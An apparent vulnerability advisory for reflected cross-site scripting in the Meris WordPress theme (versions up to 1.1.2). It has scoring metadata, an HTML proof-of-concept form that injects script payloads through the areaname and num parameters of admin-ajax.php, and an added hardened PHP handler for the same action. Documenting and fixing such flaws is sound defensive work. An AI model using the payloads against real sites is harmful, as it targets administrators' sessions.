wpexploit | Angelo Delicato | WPEX-ID:E20292AF-939A-4CB1-91E4-5FF6AA0C7FBE
Jan 01, 2024 - 12:00 a.m.

Meris <= 1.1.2 - Reflected XSS

meris
reflected xss
admin-ajax.php
file upload

AI Score: 8.7
Confidence: High
EPSS: 0.001
Percentile: 17.0%

Description

The theme does not sanitise and escape some parameters before outputting them back in the page, leading to Reflected Cross-Site Scripting, which could be used against high-privilege users such as admins.

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=meris_widget_area_generator" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="areaname" value="<script>alert(/XSS-areaname/)</script>" />
      <input type="hidden" name="num" value='"><script>alert(/XSS-num/)</script>' />
      <input type="submit" value="XSS PoC" />
    </form>
  </body>
</html>
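
A hardened handler for the same AJAX action, added here as an example and not taken from the Meris theme. Only the action name and the parameter names areaname and num come from the PoC above; the function name, nonce action, capability, upper bound on num and the output markup are assumptions.

```php
<?php
// Added example: hypothetical hardened handler, not the Meris theme's code.
// From the PoC: action meris_widget_area_generator, parameters areaname and num.
// Everything else (names, nonce action, capability, markup) is assumed.

add_action( 'wp_ajax_meris_widget_area_generator', 'example_widget_area_generator' );

function example_widget_area_generator() {
    // Assumed nonce action and field. Without a valid nonce the request is
    // rejected, so a form auto-submitted from another origin never reaches
    // the output code below.
    check_ajax_referer( 'example_widget_area_nonce', 'nonce' );

    // Assumed capability for managing widget areas.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Validate on input: areaname as plain text, num as a non-negative integer.
    $areaname = isset( $_POST['areaname'] )
        ? sanitize_text_field( wp_unslash( $_POST['areaname'] ) )
        : '';
    $num = isset( $_POST['num'] ) ? absint( $_POST['num'] ) : 0;

    // The upper bound of 100 is an arbitrary value chosen for this example.
    if ( '' === $areaname || $num > 100 ) {
        wp_send_json_error( 'invalid input', 400 );
    }

    // Escape on output, per context: esc_html() for element content,
    // esc_attr() for attribute values, %d for the integer.
    printf(
        '<div class="widget-area-row"><span>%1$s</span>' .
        '<input type="hidden" name="widget_area[%2$d]" value="%3$s" /></div>',
        esc_html( $areaname ),
        $num,
        esc_attr( $areaname )
    );
    wp_die();
}
```

With this handling, the PoC's num value is coerced to 0 by absint(), and the areaname value has its tags stripped by sanitize_text_field() before being escaped again on output.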
